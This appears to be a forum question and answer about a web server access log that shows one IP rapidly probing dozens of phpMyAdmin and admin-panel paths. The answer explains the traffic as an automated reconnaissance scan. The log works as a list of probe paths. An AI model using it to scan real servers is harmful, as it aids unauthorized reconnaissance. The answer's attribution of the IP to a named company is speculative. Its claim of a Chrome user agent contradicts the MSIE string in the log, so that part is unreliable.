[23/Mar/2020:03:29:16 +0000] "GET /db/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /dbadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /web/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /admin/pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /admin/PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/mysql2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /mysqladmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /mysql-admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /mysql_admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /phpadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /phpAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /myadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:24 +0000] "GET /myadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /phpMyadmin_bak/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /www/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpmyadmin-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpMyAdminold/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpMyAdmin.old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /pma-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpMyAbmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:29 +0000] "GET /phpMyAdmin__/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"

Answer 1

According to some passive info I've gathered on your attacker's IP it seems to point to vanyang.com.cn which looks like a legit manufacture company based on Wenzhou, Zhejiang. They don't belong to any security blacklist nor there are security intelligence pointing towards them.

They are running an automatic basic recon tool to scan your website for vulnerabilities that they might use towards you in case they can exploit them with a tool like nmap or nessus. This kind of traffic does not belong to a legit use case unless it's consented, which I assume it's not. Furthermore, the user agent they are using is already pretty weird, since in case they were spidering your website it's good practice to use a very distinctive user agent that indicates they are using a bot, which they are trying to hide with a Chrome user agent.

There are 3 things that I find very weird about it though:

1. Why is your website always answering with a 301, are you redirecting all traffic to https and they are trying to access it through http?

2. Why on earth is that company performing this kind of attack? Has their web server being hacked?

3. Why on earth are you on their radar?

It looks to me that either way they are in the beginning of a possible attack, they are probably just scanning your website as they are doing for a 1000 other more, what I'd do is to monitor your webserver and make sure you can spot any anomaly on processes, network patterns or login attempts in the same way you are monitoring the nginx logs.

Good job on spotting the attack and keep safe.